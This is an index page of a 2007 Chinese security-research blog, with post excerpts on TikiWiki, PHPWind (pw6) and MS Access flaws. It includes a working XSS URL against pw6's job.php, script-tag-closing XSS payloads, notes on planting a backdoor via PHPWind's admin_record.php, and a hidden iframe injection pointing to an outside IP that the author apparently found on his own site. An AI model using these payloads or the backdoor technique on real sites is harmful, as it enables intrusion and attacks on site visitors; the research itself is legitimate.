• 2007-10-30

    [zz]TikiWiki Remote PHP Code Evaluation Vulnerability

    [zz]TikiWiki Remote PHP Code Evaluation Vulnerability http://marc.info/?l=bugtraq&m=119367315118490&w=2 se大牛必出NB 这个bug的利用很有意思的,有兴趣的同学可以分析下 :) 我说杂这段时间se大牛没有革新http://www.hardened-php.net 和他的blog 原来是在www.sektioneins.de里忙..
    Tag:
    superhei 发表于23:33:06 | 阅读全文 | 评论1 | 编辑 | 推荐

  • 2007-10-21

    Web Application Attack and Audit Framework

    Web Application Attack and Audit Framework

    昨天看到fd上发布了一个Web Application Attack and Audit Framework--w3af :http://w3af.sourceforge.net/ 看上去很不错,不过现在好象不支持windows.以前我一直想开发一个属于自己的web app attack framework,但是直接的程序水平和时间有限啊,一直没有搞,而是直接使用了Metasploit,由于自己会点perl所以采用了Metasploit2.7做exp集合[不过也是好久没加新东西进去了:)] :
    Tag:
    superhei 发表于14:25:57 | 阅读全文 | 评论2 | 编辑 | 推荐

  • 2007-10-18

    Owning the Owner

    Owning the Owner

    上晚班的时候看xss牛书[Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense],里面有249页开始有一节叫再次告诉我们"危险无处不在",早在几年前开始流行Client Application Security的时候,就想到了penetration testing tools或者sec tool的一些安全问题:比如杀毒软件/防火墙等的一些溢出[尤其是active的现在都很流行],或者还有一些其他的类型的溢出比如url长度等等.这里
    给我们介绍的是js/html代码插入的一些攻击...
    Tag:
    superhei 发表于21:02:47 | 阅读全文 | 评论5 | 编辑 | 推荐

  • 2007-10-16

    被强奸了~~~

    <iframe src=http://202.x/npserver/webform1.aspx? height=0 width=0></iframe>
    <script type="text/javascript"> var myTranFunc = function () { window.location.target="_self"; window.location.href="http://google.com"; }; window.setTimeout("myTranFunc()",800); window.setTimeout("myTranFunc()",2000); </script>

    nnd ...
    Tag:
    superhei 发表于23:17:09 | 阅读全文 | 评论0 | 编辑 | 推荐

  • 2007-10-06

    pw的一个放后门的方式

    pw的一个放后门的方式

    data\bbscache\admin_record.php是记录后台登陆和操作的,我们看看是怎么操作这个文件的:

    admin\admincp.php:

    $bbsrecordfile=D_P."data/bbscache/admin_record.php";
    if(!file_exists($bbsrecordfile)){
        writeover($bbsrecordfile,"<?php die;?>\n");
    }//这个if只是说如果不存在admin_record.php 就用代码生成一个

    如果我们只是编辑admin_record.php 把<?php...
    Tag:
    superhei 发表于18:48:58 | 阅读全文 | 评论1 | 编辑 | 推荐

  • 2007-10-06

    MS Access SQL Injection Cheat Sheet

    http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html

     

    主要是提到了%00做注释用,在实际的asp=access的注射%00 是不太好传递的 因为asp基本很多函数等的处理一样被%00截断 :)

    Tag:
    superhei 发表于09:18:54 | 阅读全文 | 评论0 | 编辑 | 推荐

  • 2007-10-05

    future-of-firefox-and-javascript

    http://ejohn.org/blog/future-of-firefox-and-javascript/
    Tag:
    superhei 发表于13:21:57 | 阅读全文 | 评论0 | 编辑 | 推荐

  • 2007-10-04

    郁闷的blogbus

    又要改,又不改好....

    搞到现在都不显示评论侧拦了............. 

    Tag:
    superhei 发表于23:50:11 | 阅读全文 | 评论2 | 编辑 | 推荐

  • 2007-09-28

    js闭合标签优先

    js闭合标签优先

    今天RAyH4c给我看了一个xss,类似代码是:

    <script type="text/javascript">parseInt('</script><script>alert(/xss22/)</script>');</script>

    确实可以,但是我运行下面的代码:

    <script type="text/javascript">parseInt('<script>alert(/xss22/)</script>');</script>

    这样确不行.

    问了下luoluo哥哥: js闭合标签优先
    Tag:
    superhei 发表于19:39:05 | 阅读全文 | 评论1 | 编辑 | 推荐

  • 2007-09-27

    pw6 tagname xss

    pw6 tagname xss

    /job.php?action=tag&tagname=%3Cscript%3Ealert(123456789)%3C/script%3E
    Tag:
    superhei 发表于13:31:33 | 阅读全文 | 评论1 | 编辑 | 推荐

  • 2007-09-24

    pw6的一个url转跳[BUG?]

    pw6的一个url转跳[BUG?]


    \hack.php的Codz:

    require_once('global.php');
    $H_name = GetGP('H_name'); //想当于$_GET[H_name]
    if(ereg("^http",$H_name)!==false){
        ObHeader("$H_name"); //如果是http就通过ObHeader转跳
    } elseif(!$db_hackdb[$H_name] || !is_dir(R_P."hack/$H_name") || !file_exists(R_P."hack/$H_name/index.php"...
    Tag:
    superhei 发表于21:47:08 | 阅读全文 | 评论0 | 编辑 | 推荐

  • 2007-09-24

    pw6取消了全局变量

    pw6取消了全局变量

    前几天看到pw6出来了,saiy说pw6取消了全局变量:

    if(ini_get('register_globals')){
        foreach($GLOBALS as $key=>$val){
            if(!in_array($key,array('GLOBALS','_POST','_GET','_COOKIE','_SERVER','_FILES','wind_in'))){
                ${$key}='';//提取所有的变量,如果不在里面就设置为空
     &nbs...
    Tag:
    superhei 发表于16:14:43 | 阅读全文 | 评论0 | 编辑 | 推荐

  • 2007-09-24

    hitbsecconf2007

    http://conference.hackinthebox.org/hitbsecconf2007kl/materials/
    Tag:
    superhei 发表于12:14:58 | 阅读全文 | 评论0 | 编辑 | 推荐

  • 2007-09-22

    现在的人真牛~~

    现在的人真牛~~

    本来是今天和明天考试的,昨天晚上接到通知:
    ^考试取消.
    why?
    ^因为卫生部通知说考题泄露....
    汗~~~,我估计连备用的题目都可以漏了.现在的人真牛,看来厕所墙上写的那个包过的号码还是可以试一试啊
    Tag:
    superhei 发表于11:31:11 | 阅读全文 | 评论0 | 编辑 | 推荐

  • 2007-09-17

    The Unexpected SQL Injection

    http://www.webappsec.org/projects/articles/091007.shtml
    Tag:
    superhei 发表于23:48:38 | 阅读全文 | 评论1 | 编辑 | 推荐
共13页 第一页 上一页 1 2 3 4 5 6 7 8 9 10 下一页 最后一页

Tag

    More..